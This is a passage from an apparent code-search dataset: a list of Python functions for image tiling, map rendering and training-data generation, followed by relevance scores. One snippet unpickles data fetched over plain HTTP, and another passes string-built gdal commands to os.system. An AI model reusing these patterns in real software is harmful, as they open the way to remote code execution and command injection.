plt.savefig(\"SteerablePyramid/level\"+ str(level) +\".png\")\n plt.clf()", "def generate_overview_tiles(self):\n\n gdal.SetConfigOption(\"GDAL_PAM_ENABLED\", \"NO\")\n\n print \"Generating Overview Tiles:\"\n\n if self.options.profile == 'garmin': # no overview tiles for 'garmin'\n return\n # Usage of existing tiles: from 4 underlying tiles generate one as overview.\n\n tcount = 0\n zcount = 0\n for tz in range(self.tmaxz-1, self.tminz-1, -1):\n tminx, tminy, tmaxx, tmaxy = self.tminmax[tz]\n tcount += (1+abs(tmaxx-tminx)) * (1+abs(tmaxy-tminy))\n zcount+=1\n if self.options.resume:\n count_tiles=tcount\n zcount+=1\n tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]\n count_tiles += (1+abs(tmaxx-tminx)) * (1+abs(tmaxy-tminy))\n i_count = self.tile_exists(0, 0, 0,1)\n if i_count == count_tiles:\n if self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; all-tiles [\",zcount,\"] zoom-levels with tiles[\",count_tiles,\"]\"\n return\n ti = 0\n\n # querysize = tilesize * 2\n\n for tz in range(self.tmaxz-1, self.tminz-1, -1):\n tminx, tminy, tmaxx, tmaxy = self.tminmax[tz]\n i_x_column_count=((tmaxx-tminx)+1)\n i_y_column_count=((tmaxy-tminy)+1)\n if self.options.verbose:\n # tx in range(tminx, tmaxx+1) tminx[ 140798 ] tmaxx[ 140872 ] ; ((tmaxx-tmaxy)+1) x_tiles[ -35331 ]\n print \"\\ttz=[\",tz,\"] : tx in range(tminx, tmaxx+1) tminx[\",tminx,\"] tmaxx[\",tmaxx,\"] ; ((tmaxx-tminx)+1) x_tiles[\",i_x_column_count,\"]\"\n # ty_tms in range(tmaxy, tminy-1, -1) tmaxy[ 176204 ] tminy[ 176126 ] ; ((tmaxy-tminy)) y_tiles[ 78 ]\n print \"\\ttz=[\",tz,\"] :ty_tms in range(tmaxy, tminy-1, -1) tmaxy[\",tmaxy,\"] tminy[\",tminy,\"] ; ((tmaxy-tminy)) y_tiles[\",i_y_column_count,\"]\"\n if self.options.resume:\n i_count = self.tile_exists(0, 0, tz,2)\n print \"\\tTile generation skipped because of --??? 
; x/y-tiles of z[\",tz,\"] x/y_tiles[\",tcount,\"] i_count[\",i_count,\"]\"\n if i_count == tcount:\n if self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; x/y-tiles of z[\",tz,\"] x/y_tiles[\",tcount,\"]\"\n break\n for tx in range(tminx, tmaxx+1):\n tmaxy_work=tmaxy\n if self.options.resume:\n i_count = self.tile_exists(tx, 0, tz,3)\n print \"\\tTile generation skipped because of --??? ; z =\",tz,\" ; y-tiles of x[\",tx,\"] y_tiles[\",i_y_column_count,\"] i_count[\",i_count,\"]\"\n if i_count == i_y_column_count:\n if self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; z =\",tz,\" ; y-tiles of x[\",tx,\"] y_tiles[\",i_y_column_count,\"]\"\n break\n else:\n if i_count > 0:\n # this assums the rows are compleate, which may NOT be true 18-140798-176204.jpg\n tmaxy_work-=i_count\n if self.options.verbose:\n print \"\\tTile generation skipped to tmaxy[\",tmaxy_work,\"] because of --resume ; z =\",tz,\" ; y-tiles of x[\",tx,\"] y_tiles[\",i_y_column_count,\"]\"\n for ty_tms in range(tmaxy_work, tminy-1, -1): #range(tminy, tmaxy+1):\n ty_osm=self.flip_y(tz,ty_tms)\n ty=ty_tms\n if self.options.tms_osm:\n ty=ty_osm\n if self.stopped:\n if self.options.mbtiles:\n if self.mbtiles_db:\n self.mbtiles_db.close_db()\n self.mbtiles_db=None\n break\n\n ti += 1\n\n if self.options.resume:\n exists = self.tile_exists(tx, ty, tz,0)\n if exists and self.options.verbose:\n print \"\\tTile generation skipped because of --resume\"\n else:\n exists = False\n\n if not exists:\n if self.options.verbose:\n print ti, '/', tcount, self.get_verbose_tile_name(tx, ty, tz)\n try:\n self.write_overview_tile(tx, ty, tz,self.options.tms_osm)\n except ImageOutputException, e:\n self.error(\"'%d/%d/%d': %s\" % (tz, tx, ty, e.message))\n\n if not self.options.verbose or self.is_subprocess:\n self.progressbar( ti / float(tcount) )\n if self.options.mbtiles:\n if self.mbtiles_db:\n self.mbtiles_db.close_db()\n self.mbtiles_db=None", "def iter_grid_tiles(self):\n all_points = self.grid[0].union(self.grid[1], self.grid[2], {self.position})\n min_x = min(p.x for p in all_points)\n min_y = min(p.y for p in all_points)\n\n if min_x < 0:\n xoffset = -min_x\n elif min_x == 0:\n xoffset = 0\n elif min_x > 0:\n xoffset = min_x\n if min_y < 0:\n yoffset = -min_y\n elif min_y == 0:\n yoffset = 0\n elif min_y > 0:\n yoffset = min_y\n origin = Point(0 + xoffset, 0 + yoffset)\n position = Point(self.position.x + xoffset, self.position.y + yoffset)\n for tile_type in (0, 1, 2):\n for point in self.grid[tile_type]:\n newpoint = Point(point.x + xoffset, point.y + yoffset)\n if newpoint not in (origin, position):\n yield newpoint.x, newpoint.y, tile_type\n yield origin.x, origin.y , 4\n yield position.x, position.y, 3", "def createTiles():\n Renderer.Clear()\n map = []\n w, h = len(testmap[0]), len(testmap)\n x, y = 0, 0\n for row in testmap:\n for char in row:\n map.append(makeTile(char, x, y))\n x += 1\n y += 1\n x = 0\n\n return map, w, h", "def batch(img_path, gt_path,img_list, batch, total_size, label_list):\r\n\r\n image_list = [os.path.join(img_path, i) for i in img_list]\r\n gt_list = [os.path.join(gt_path,i) for i in img_list]\r\n\r\n \r\n for i in range(0, total_size, batch):\r\n yield image_load_resize(image_list[i:i+batch]), make_label_map(gt_list[i:i+batch], label_list)", "def sample_tiles(self, fc, image_spec, export_radius, tags=None):\n image_spec, output_bands = self._get_image_spec_helper(image_spec, tags)\n fc = add_imagery(fc, image_spec, output_size=export_radius)\n 
return fc, output_bands", "def make_board(self):\n http = urllib3.PoolManager()\n r = http.request('GET', 'http://www.cse.msu.edu/~ruppmatt/itm891/tiles.pickle')\n tiles = pickle.loads(r.data)\n self.assets = tiles\n self.gameboard = Image.new('RGBA', (64*(self.world_width+2), 64*(self.world_height+2)))\n # Laydown land\n for c in range(0,self.world_width):\n for r in range(0, self.world_height):\n x = (c+1)*64\n y = (r+1)*64\n tile_ndx = np.random.choice(len(tiles['land']))\n self.gameboard.paste(tiles['land'][tile_ndx], (x,y)) \n # Laydown water\n for c in range(0,self.world_width):\n x = (c+1)*64\n yy = (self.world_height+1)*64\n self.gameboard.paste(tiles['water']['edge_north'], (x,0))\n self.gameboard.paste(tiles['water']['edge_south'], (x, yy))\n for r in range(0,self.world_height):\n y = (r+1)*64\n xx = (self.world_width+1)*64\n self.gameboard.paste(tiles['water']['edge_west'], (0,y))\n self.gameboard.paste(tiles['water']['edge_east'], (xx,y))\n self.gameboard.paste(tiles['water']['corner_nw'], (0,0))\n self.gameboard.paste(tiles['water']['corner_sw'], (0,(self.world_height+1)*64))\n self.gameboard.paste(tiles['water']['corner_ne'], ((self.world_width+1)*64,0))\n self.gameboard.paste(tiles['water']['corner_se'], ((self.world_width+1)*64,(self.world_height+1)*64))\n \n # Some land lines\n draw = ImageDraw.Draw(self.gameboard)\n for c in range(0,self.world_width-1):\n y_1 = 64\n y_2 = 64*(self.world_height+1)\n x = (2+c)*64\n draw.line([(x,y_1),(x,y_2)], fill='white', width=1)\n for r in range(0,self.world_height-1):\n y = (2+r)*64\n x_1= 64\n x_2 = 64 * (self.world_width+1)\n draw.line([(x_1,y),(x_2,y)], fill='white', width=1)\n return", "def stitch_map(tiles, width, height, bbox, dpi):\n size = (int(width * dpi_to_dpmm(dpi)), int(height * dpi_to_dpmm(dpi)))\n background = Image.new('RGBA', size, (255, 255, 255))\n for layer in tiles:\n layer_img = Image.new(\"RGBA\", size)\n for (x, y), tile_path in layer.items():\n tile = Image.open(tile_path)\n layer_img.paste(tile, ((x - bbox.min.x) * TILE_SIZE, (y - bbox.min.y) * TILE_SIZE))\n background = Image.alpha_composite(background, layer_img)\n add_scales_bar(background, bbox)\n return background.convert(\"RGB\")", "def generate_tile(self, tms_x, tms_y, tms_z, arguments):\n pass", "def getimgs():", "def test_unbounded_tileset_image(self):\n\t\t# Create an 8x6 tileset image placeholder\n\t\tself.expected_tile_width = 8\n\t\tself.expected_tile_height = 6\n\t\tself.expected_rows = self.expected_tile_height\n\t\tself.expected_cols = self.expected_tile_width\n\n\t\tself.test_image = dummy_image(self.expected_width(), self.expected_height())\n\t\tself.test_image_grid = TextureGrid(ImageGrid(self.test_image, self.expected_rows, self.expected_cols))\n\n\t\t# Test creating a TilesetImage without specifying dimensions\n\t\tself.tileset_image = TilesetImage(self.test_image)\n\n\t\tself.assert_tileset_image('Rows and columns not specified.')", "def split_image_into_number_of_tiles(\n arr: Image, x_ntiles: int, y_ntiles: int, overlap: int\n):\n img_width, img_height = arr.shape[-1], arr.shape[-2]\n tile_w = img_width // x_ntiles\n tile_h = img_height // y_ntiles\n return split_image_into_tiles_of_size(arr, tile_w, tile_h, overlap)", "def __init__(self, tiles):\n self.tiles = tiles", "def load_images(self):\r\n self.standing_frame = [load_image(\"cat1.png\")]\r\n self.walk_frames_r = [load_image(\"cat2.png\"), load_image(\"cat3.png\"),\r\n load_image(\"cat4.png\")]", "def cutTiles(tasksInfo, results, origLocation, destLocation, \\\n completedOnly, 
nAnswers = 0):\n tmpMosaic = destLocation+\"/tmpMosaic_n\"+str(nAnswers)+\"/\"\n createDir(tmpMosaic)\n\n #Setting info on images\n numberImages = 12\n tmpImg = []\n for i in range(numberImages):\n tmpImg.append(destLocation+\"/tmpImg_n\"+str(i+1).zfill(2)+\"/\")\n createDir(tmpImg[i])\n imgFile = []\n imgFile.append('2011352')\n imgFile.append('2011353')\n imgFile.append('2011355')\n imgFile.append('2011357')\n imgFile.append('2011358')\n imgFile.append('2011359')\n imgFile.append('2011360')\n imgFile.append('2011361')\n imgFile.append('2011362')\n imgFile.append('2011363')\n imgFile.append('2011364')\n imgFile.append('2011365')\n\n #Setting info on image type\n formatFile = \"GTiff\"\n driver = gdal.GetDriverByName(formatFile)\n\n #Open file containing geoinfo on best result and statistical info on all\n if completedOnly == 1:\n f = open(destLocation+'/bestInfo.txt','w')\n #~ fStat = open(destLocation+'/statInfoCompleted.txt','w')\n #~ else:\n #~ fStat = open(destLocation+'/statInfoAll_n'+str(nAnswers)+'.txt','w')\n\n fSelect = open(destLocation+'/selectedTile.txt','w')\n numberTasks = len(tasksInfo)\n print 'tasksInfo: ', len(tasksInfo)\n print 'results: ', len(results)\n for task in range(numberTasks):\n #Checking if the task has the mininum number of answers\n if (sum(results[task]) < nAnswers):\n #If it has not, lets go to the next task\n continue\n #Geting the selected day for each task\n taskId = tasksInfo[task]['taskId']\n definedArea = tasksInfo[task]['area']\n selectedTile = results[task].index(max(results[task]))\n if selectedTile == 0:\n selectedFile = '2011352'\n elif selectedTile == 1:\n selectedFile = '2011353'\n elif selectedTile == 2:\n selectedFile = '2011355'\n elif selectedTile == 3:\n selectedFile = '2011357'\n elif selectedTile == 4:\n selectedFile = '2011358'\n elif selectedTile == 5:\n selectedFile = '2011359'\n elif selectedTile == 6:\n selectedFile = '2011360'\n elif selectedTile == 7:\n selectedFile = '2011361'\n elif selectedTile == 8:\n selectedFile = '2011362'\n elif selectedTile == 9:\n selectedFile = '2011363'\n elif selectedTile == 10:\n selectedFile = '2011364'\n elif selectedTile == 11:\n selectedFile = '2011365'\n print taskId\n print selectedFile\n print definedArea\n fSelect.write(str(taskId)+\" \"+selectedFile+\"\\n\")\n #Printing bestInfo\n if completedOnly == 1:\n f.write(str(definedArea[0])+\" \"+ str(definedArea[1])+\" \"+\\\n str(definedArea[2])+\" \"+str(definedArea[3])+\"\\n\")\n cmd = \"gdal_translate -projwin \"+str(definedArea[0])+\" \"+ \\\n str(definedArea[3])+\" \"+str(definedArea[2])+\" \"+ \\\n str(definedArea[1])+\" \"+origLocation+selectedFile+\".tif \"+ \\\n tmpMosaic+str(taskId)+\".tif\"\n os.system(cmd)\n #Generating image cuts for all images\n for i in range(numberImages):\n cmd = \"gdal_translate -projwin \"+str(definedArea[0])+\" \"+ \\\n str(definedArea[3])+\" \"+str(definedArea[2])+\" \"+ \\\n str(definedArea[1])+\" \"+origLocation+imgFile[i]+\".tif \"+ \\\n tmpImg[i]+str(taskId)+\".tif\"\n os.system(cmd)\n #Changing filename based on the type of result (if all results or\n #completed only.\n if completedOnly == 0:\n if nAnswers == 0:\n fileMosaic = \"mosaicall\"\n else:\n fileMosaic = \"mosaicall\"+\"_n\"+str(nAnswers)\n elif completedOnly == 1:\n if nAnswers == 0:\n fileMosaic = \"mosaiccompleted\"\n else:\n fileMosaic = \"mosaiccompleted\"+\"_n\"+str(nAnswers)\n #Checking if the temporary tile folder is not empty\n if os.listdir(tmpMosaic) == []:\n print \"No output detected for desired parameter N = \" + str(nAnswers)\n 
#Removing temporary directories\n removeDir(tmpMosaic)\n #Returning error code\n resultCut = 1\n return resultCut\n #Merging the tiles into one mosaic\n cmd = \"gdal_merge.py -init '200 200 200' -o \"+destLocation+fileMosaic+\".tif \"+tmpMosaic+ \\\n \"*.tif\"\n os.system(cmd)\n #Copying file with timestamp\n now = datetime.datetime.now()\n timeCreation = now.strftime(\"%Y-%m-%d_%Hh%M\")\n shutil.copyfile(destLocation+fileMosaic+\".tif\", destLocation+ \\\n fileMosaic+\"_\"+timeCreation+\".tif\")\n #Close file containing geoinfo on best result\n if completedOnly == 1:\n f.close()\n #Close stat file\n #~ fStat.close()\n fSelect.close()\n #Removing temporary directories\n #~ removeDir(tmpMosaic)\n #~ for i in range(numberImg):\n #~ removeDir(tmpImg[i])\n #Final state\n resultCut = 0\n return resultCut", "def create_png_images(self):\n if self.subject is None:\n print Console.WARNING + 'You need to specify a subject first' + Console.ENDC\n return\n\n check_dir_of = self.locations.check_dir_of\n check_dir_of(self.locations.HISTO_PNG_U)\n check_dir_of(self.locations.HISTO_PNG)\n check_dir_of(self.locations.SOURCE_PNG)\n\n\n\n fmap_img = ImageUtils.load_nifti_image(self.locations.HIST_FMAP) #loading subject nifti files\n volumes = []\n try:\n for s in self.locations.SOURCES:\n volumes.append(ImageUtils.load_nifti_image(s))\n except IOError as e:\n print Console.FAIL + 'There are errors loading nifi files for subject %s'%self.subject + Console.ENDC\n return False\n \n\n num_slices = volumes[0].shape[2] #use first volume to check expected number of slices\n\n self.locations.create_empty_dir(self.locations.IMAGES_DIR)\n\n print 'Creating input PNGs for %s'%self.subject\n for k, vol in enumerate(volumes):\n for i in range(num_slices):\n imslice = ImageUtils.data_to_bytescale_rgb(vol[:, :, i])\n im = Image.fromarray(imslice)\n im.save(self.locations.SOURCE_PNG % (self.locations.LABELS[k],i))\n\n \n print 'Creating histology PNGs for %s'%self.subject\n for i in range(num_slices):\n\n im_unscaled = ImageUtils.data_to_unscaled_rgb(fmap_img[:, :, i]); #keeps the original values\n im_unscaled = Image.fromarray(im_unscaled)\n im_unscaled = im_unscaled.filter(ImageFilter.GaussianBlur(radius=2)) #Filter requested by Ali Khan\n im_unscaled.save(self.locations.HISTO_PNG_U % i)\n\n im_scaled = ImageUtils.data_to_bytescale_rgb(fmap_img[:,:,i]); # bytescaled histology\n im_scaled = Image.fromarray(im_scaled)\n im_scaled = im_scaled.filter(ImageFilter.GaussianBlur(radius=2)) #Filter requested by Ali Khan\n im_scaled.save(self.locations.HISTO_PNG % i)\n\n print\n return True", "def prepare_map(self):\n for y, row in enumerate(self.contents):\n for x, tile in enumerate(row):\n bm = self.get_tile(tile)\n self.image[\n y * TILE_SIZE : (y + 1) * TILE_SIZE,\n x * TILE_SIZE : (x + 1) * TILE_SIZE,\n ] = bm", "def Dev_Image_data_generator(folderlist,resize = (920,1200),Transformation = True, scaling = True, batch_size = 16):\n\n while True:\n total_classes = len(folderlist.keys())\n keys = folderlist.keys()\n Images = []\n Image_label = []\n for key in folderlist.keys():\n img_label = random.choice(folderlist[key])\n img = Image.open(img_label,'r')\n h = resize[1]\n l = int(img.size[1]*h/img.size[0])\n img = img.resize((h,l), Image.ANTIALIAS)\n background = Image.new('RGB', (resize[1], resize[0]), (255, 255, 255))\n img_w, img_h = img.size\n bg_w, bg_h = background.size\n offset = (int((bg_w - img_w) / 2), int((bg_h - img_h) / 2))\n background.paste(img, offset)\n background = np.asarray(background)\n if Transformation == 
True:\n rotation = rotate(background,random.choice(range(360)))\n translate = translate_xy(background,random.choice(range(resize[0]/4)),random.choice(range(resize[1]/4)))\n flip = cv2.flip(rotation,1)\n Y = np.concatenate((rotation[np.newaxis,:,:,:],flip[np.newaxis,:,:,:],translate[np.newaxis,:,:,:]))\n Images.append(Y)\n Images.append(background[np.newaxis,:,:,:])\n Image_label.append([key for i in range(4)])\n else:\n Images.append(background[np.newaxis,:,:,:])\n Image_label.append([key])\n Image_label = np.concatenate(Image_label)\n Images = np.concatenate(Images)\n Image_label = np.array(pd.get_dummies(Image_label))\n X_Image , Y_Image = shuffle(Images,Image_label,random_state=0)\n if scaling == True:\n X_Image = X_Image/255\n else:\n X_Image = X_Image\n batches = int(len(X_Image)/batch_size)\n for batch in range(batches):\n x = X_Image[batch*batch_size:(batch+1)*batch_size,:,:,:]\n y = Y_Image[batch*batch_size:(batch+1)*batch_size]\n yield((x,y))", "def make_layers(self):\n w, h = self.image.get_size()\n shrink = pg.transform.smoothscale(self.image, (w//2, h//2))\n self.mid_image = tools.tile_surface((w,h), shrink, True)\n shrink = pg.transform.smoothscale(self.image, (w//4, h//4))\n self.base = tools.tile_surface(prepare.SCREEN_SIZE, shrink, True)", "def gather_images():\n # Import an empty image\n null_img = Image.open('assests/null/null.png')\n null_img = ImageTk.PhotoImage(null_img.resize((100,100), Image.ANTIALIAS))\n\n # Import image and icon for X\n X_img = Image.open('assests/X_Assets/X.png')\n X_icon = ImageTk.PhotoImage(X_img.resize((15, 12), Image.ANTIALIAS))\n X_img = ImageTk.PhotoImage(X_img.resize((95, 80), Image.ANTIALIAS))\n\n # Import horizontally striked X\n X_hor = Image.open('assests/X_Assets/X_hor.png')\n X_hor = ImageTk.PhotoImage(X_hor.resize((95, 80), Image.ANTIALIAS))\n\n # Import vertically striked X\n X_vert = Image.open('assests/X_Assets/X_vert.png')\n X_vert = ImageTk.PhotoImage(X_vert.resize((95, 80), Image.ANTIALIAS))\n\n # Import diagonally strikedX\n X_diag = Image.open('assests/X_Assets/X_diag.png')\n X_diag = ImageTk.PhotoImage(X_diag.resize((95, 80), Image.ANTIALIAS))\n\n # Import another diagonally striked X\n X_diag2 = Image.open('assests/X_Assets/X_diag2.png')\n X_diag2 = ImageTk.PhotoImage(X_diag2.resize((95, 80), Image.ANTIALIAS))\n\n # Import image and icon for O\n O_img = Image.open('assests/O_Assets/O.png')\n O_icon = ImageTk.PhotoImage(O_img.resize((14, 14), Image.ANTIALIAS))\n O_img = ImageTk.PhotoImage(O_img.resize((90, 90), Image.ANTIALIAS))\n\n # Import horizontally striked O\n O_hor = Image.open('assests/O_Assets/O_hor2.png')\n O_hor = ImageTk.PhotoImage(O_hor.resize((90, 90), Image.ANTIALIAS))\n\n # Import vertically striked O\n O_vert = Image.open('assests/O_Assets/O_vert2.png')\n O_vert = ImageTk.PhotoImage(O_vert.resize((90, 90), Image.ANTIALIAS))\n\n # Import diagonally striked O\n O_diag = Image.open('assests/O_Assets/O_diag.png')\n O_diag = ImageTk.PhotoImage(O_diag.resize((90, 90), Image.ANTIALIAS))\n\n # Import another diagonally striked O\n O_diag2 = Image.open('assests/O_Assets/O_diag2.png')\n O_diag2 = ImageTk.PhotoImage(O_diag2.resize((90, 90), Image.ANTIALIAS))\n\n return (null_img, X_icon, X_img, X_hor, X_vert, X_diag, X_diag2, O_icon, O_img, O_hor, O_vert, O_diag, O_diag2)", "def Valid_Image_data_generator(folderlist,resize = (920,1200),Transformation = True, scaling = True):\n\n while True:\n total_classes = len(folderlist.keys())\n keys = folderlist.keys()\n Images = []\n Image_label = []\n for key in 
tqdm(folderlist.keys()):\n for j in range(len(folderlist[key])):\n img_label = folderlist[key][j]\n img = Image.open(img_label,'r')\n h = resize[1]\n l = int(img.size[1]*h/img.size[0])\n img = img.resize((h,l), Image.ANTIALIAS)\n background = Image.new('RGB', (resize[1], resize[0]), (255, 255, 255))\n img_w, img_h = img.size\n bg_w, bg_h = background.size\n offset = (int((bg_w - img_w) / 2), int((bg_h - img_h) / 2))\n background.paste(img, offset)\n background = np.asarray(background)\n if Transformation == True:\n rotation = rotate(background,random.choice(range(360)))\n translate = translate_xy(background,random.choice(range(resize[0]/4)),random.choice(range(resize[1]/4)))\n flip = cv2.flip(rotation,1)\n Y = np.concatenate((rotation[np.newaxis,:,:,:],flip[np.newaxis,:,:,:],translate[np.newaxis,:,:,:]))\n Images.append(Y)\n Images.append(background[np.newaxis,:,:,:])\n Image_label.append([key for i in range(4)]) # Four because we are doing rot,trans,flip and one original Image\n else:\n Images.append(background[np.newaxis,:,:,:])\n Image_label.append([key])\n Image_label = np.concatenate(Image_label)\n Images = np.concatenate(Images)\n Image_label = np.array(pd.get_dummies(Image_label))\n X_Image , Y_Image = shuffle(Images,Image_label,random_state=0)\n if scaling == True:\n X_Image = X_Image/255\n else:\n X_Image = X_Image\n return (X_Image,Y_Image)", "def generate_image_grid(sess, op):\n n = 10\n x_points = np.linspace(-20, 20, n)\n y_points = np.linspace(-20, 20, n)\n\n nx, ny = len(x_points), len(y_points)\n plt.subplot()\n gs = gridspec.GridSpec(nx, ny, hspace=0.05, wspace=0.05)\n\n for i, g in enumerate(gs):\n z = np.concatenate(([x_points[int(i / ny)]], [y_points[int(i % nx)]]))\n z = np.reshape(z, (1, 2))\n x = sess.run(op, feed_dict={decoder_input: z})\n ax = plt.subplot(g)\n img = np.array(x.tolist()).reshape(28, 28)\n ax.imshow(img, cmap='gray')\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_aspect('auto')\n plt.show()", "def makeImage(self):\n\n for row in range(self.height):\n self.makeRow(row)\n self.window.update() # display a row of pixels", "def image_generator_not_random(list_of_files, crop_size=320, scale=1):\n while True:\n text_region = []\n for jpgname in list_of_files:\n print jpgname\n # jpgname = np.random.choice(list_of_files)\n img = cv2.imread(jpgname)\n pattern = re.compile('jpg')\n txtname = pattern.sub('txt', jpgname)\n if not os.path.isfile(txtname):\n continue\n cropped_image = img\n with open(txtname, 'r') as f:\n for line in f:\n line_split = line.strip().split(',')\n print line_split\n # clockwise\n (x1, y1, x2, y2) = line_split[0:4]\n (x3, y3, x4, y4) = line_split[4:8]\n text_region.append([string.atof(x1), string.atof(y1), string.atof(x2), string.atof(y2),\n string.atof(x3), string.atof(y3), string.atof(x4), string.atof(y4)])\n if cropped_image is None or text_region is None or \\\n cropped_image.shape[0] != crop_size or cropped_image.shape[1] != crop_size:\n continue\n yield [scale * cropped_image, text_region]", "def generate_images_pred(self, inputs, outputs):\n for scale in self.scales:\n disp = outputs[(\"disp\", scale)]\n disp = F.interpolate(\n disp, [self.height, self.width], mode=\"bilinear\", align_corners=False)\n source_scale = 0\n\n _, depth = disp_to_depth(disp, self.min_depth, self.max_depth)\n\n outputs[(\"depth\", 0, scale)] = depth\n\n for i, frame_id in enumerate(self.frame_ids[1:]):\n\n T = outputs[(\"cam_T_cam\", 0, frame_id)]\n\n # from the authors of https://arxiv.org/abs/1712.00175\n # mean-normalized inverse depth from [62] 
to discourage shrinking of the estimated depth\n\n axisangle = outputs[(\"axisangle\", 0, frame_id)]\n translation = outputs[(\"translation\", 0, frame_id)]\n\n inv_depth = 1 / depth\n mean_inv_depth = inv_depth.mean(3, True).mean(2, True)\n\n T = transformation_from_parameters(\n axisangle[:, 0], translation[:, 0] * mean_inv_depth[:, 0], frame_id < 0)\n\n cam_points = self.backproject_depth[source_scale](\n depth, inputs[(\"inv_K\", source_scale)])\n pix_coords = self.project_3d[source_scale](\n cam_points, inputs[(\"K\", source_scale)], T)\n\n outputs[(\"sample\", frame_id, scale)] = pix_coords\n\n outputs[(\"color\", frame_id, scale)] = F.grid_sample(\n inputs[(\"color\", frame_id, source_scale)],\n outputs[(\"sample\", frame_id, scale)],\n padding_mode=\"border\")\n\n outputs[(\"color_identity\", frame_id, scale)] = \\\n inputs[(\"color\", frame_id, source_scale)]", "def buildImages(files, targets, type):\n images = []\n for file in files:\n targets.append(file)\n with open(file, \"rb\") as f:\n if type == \"Byte\":\n images.append(bytePlot(list(f.read())))\n elif type == \"Markov\":\n images.append(markovPlot(list(f.read())))\n elif type == \"Hilbert\":\n images.append(hilbertPlot(list(f.read())))\n smp.imsave(\"{}.png\".format(file), images[-1])\n return images, targets", "def tile_image(\n im: Image.Image, width: int, height: int, mode: Optional[str] = \"RGB\", **kwargs: Any\n) -> Image.Image:\n im_out = Image.new(mode, (width, height), **kwargs)\n\n h_tiles = ceil(width / im.width)\n v_tiles = ceil(height / im.height)\n\n for i in range(v_tiles):\n y = im.height * i\n for j in range(h_tiles):\n x = im.width * j\n im_out.paste(im, box=(x, y))\n\n return im_out", "def tiles(self, width: int, height: int) -> TileSet:\n y_count = len(self.tiling)\n for y_index, y_tile in enumerate(self.tiling):\n\n x_count = len(y_tile)\n for x_index, tile_strength in enumerate(y_tile):\n\n # Doing multiplication before devision here to make sure rounding is correct\n bounding_box = (\n # from (x1, y1)\n int(width * x_index / x_count),\n int(height * y_index / y_count),\n # to (x2, y2)\n int(width * (x_index + 1) / x_count),\n int(height * (y_index + 1) / y_count),\n )\n\n yield bounding_box, tile_strength", "def split_tiles(module_data):\n raise NotImplementedError", "def imagePages(files, choice):\n options = [\"Byte\", \"Markov\", \"Hilbert\"]\n type = options[int(ui.prompt(\"Choose a visualization type\", options))]\n\n targets = []\n pageNames = []\n pageSize = 100\n pages = range(math.ceil(len(files)/pageSize))\n for page in pb.progressbar(pages):\n # print(\"\\nPage {}/{}\".format(page+1, len(pages)))\n gc.collect() # Garbage collect\n\n images = []\n start = page*pageSize\n if choice == \"Create\":\n images, targets = buildImages(files[start:start+pageSize], targets, type)\n elif choice == \"Load\":\n images, targets = loadImages(files[start:start+pageSize], targets)\n pageNames.append(\"./pages/images_page{}.npy\".format(page))\n np.save(pageNames[-1], images)\n return targets, pageNames", "def place_images(self, final_list, points):\n\t\tfor i in range(8): \n # Please change this (8) into a class-level variable --KOH\n\t\t\timage_object = final_list[i]\n#\t\tif type(image_object) == 'CorrectImage':\n#\t\t\t\tself.correct = [i, points[i]]\n\t\t\timage = pygame.image.load(image_object.file_path)\n # Why can't these be stored as a property of the class --KOH\n\t\t\timagerect = image.get_rect()\n\t\t\treimage = pygame.transform.scale(image, image_object.size)\n\t\t\tself.screen.blit(reimage, 
points[i])" ]
[ "0.7096497", "0.7032253", "0.6989992", "0.69054127", "0.6749181", "0.66839963", "0.6649588", "0.65237033", "0.6499432", "0.64959127", "0.6372662", "0.6356276", "0.63422674", "0.63199794", "0.6305179", "0.6302457", "0.62703687", "0.62687695", "0.62687695", "0.62516", "0.6179207", "0.6168577", "0.6159848", "0.6129627", "0.61181986", "0.6105977", "0.6091105", "0.6074418", "0.60719657", "0.60568315", "0.60513705", "0.6046528", "0.60365885", "0.60118324", "0.600736", "0.6005098", "0.59955794", "0.5992382", "0.59850484", "0.59679246", "0.59679246", "0.5922734", "0.59211797", "0.5903535", "0.5903535", "0.5898033", "0.5895544", "0.58765906", "0.5868628", "0.584052", "0.5825845", "0.5806877", "0.5804486", "0.5782672", "0.5781892", "0.5767933", "0.5766237", "0.5763313", "0.57603866", "0.5750455", "0.5747573", "0.5742684", "0.5741854", "0.5741854", "0.5740994", "0.57399106", "0.5738692", "0.5732034", "0.5729177", "0.5721712", "0.57177716", "0.5715239", "0.57124805", "0.57096654", "0.5705561", "0.5701447", "0.5694072", "0.5689481", "0.5687296", "0.5685503", "0.56780404", "0.56694376", "0.5664625", "0.56621623", "0.5658874", "0.5654724", "0.56501424", "0.5646516", "0.5637164", "0.5632967", "0.5624567", "0.56224436", "0.5616289", "0.5615756", "0.56094617", "0.5604453", "0.5601735", "0.5601031", "0.55996126", "0.559681", "0.5592416" ]
0.0
-1
takes a command, telnet session, and a prompt and returns the output of the code
def respond(cmd,t,p):
    t.write(cmd)
    return wait(t,p)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def send_telnet_command(command):\n\n tn = telnetlib.Telnet(stb_parameters.STB_IP)\n tn.read_until(bytes(\"login: \", 'UTF-8'))\n tn.write(bytes(stb_parameters.STB_USER_NAME + \"\\n\", 'UTF-8'))\n tn.write(bytes(command + \"\\n\", 'UTF-8'))\n tn.write(bytes(\"exit\\n\", 'UTF-8'))\n result = tn.read_all().decode('ascii')\n return result", "def _execute(self, command):\n \"\"\"\n Confirm the command was correctly echoed back and then ask for\n its return code\n \"\"\"\n self.telnet_client.write((command + \"\\r\\n\").encode())\n resp = self.telnet_client.read_until((command + \"\\r\\n\").encode())\n while True:\n resp = self.telnet_client.read_until(self.prompt.encode())\n if resp is not None:\n break\n\n stdout = resp.decode()\n stderr = \"\"\n self.telnet_client.write(\"echo $?\\r\\n\".encode())\n _, match, _ = self.telnet_client.expect([re.compile(br'(\\d+)')],\n TelnetControl.TELNET_TIMEOUT)\n exit_code = int(match.group(1).decode())\n\n if exit_code != 0:\n stderr = resp.decode()\n return exit_code, stdout, stderr", "def telnet_run(self, cmd_list, prompt_usr='Username:', prompt_pwd='Password:', prompt_ena='>',\n prompt_conf=']', timeout=2, LOGIN_LOG=0):\n prompt_usr = prompt_usr.encode(\"ascii\")\n prompt_pwd = prompt_pwd.encode(\"ascii\")\n prompt_ena = prompt_ena.encode(\"ascii\")\n prompt_conf = prompt_conf.encode(\"ascii\")\n screen_buffer = {'host': self.host}\n log_sleep_time = 1\n output = ''\n try:\n tn = 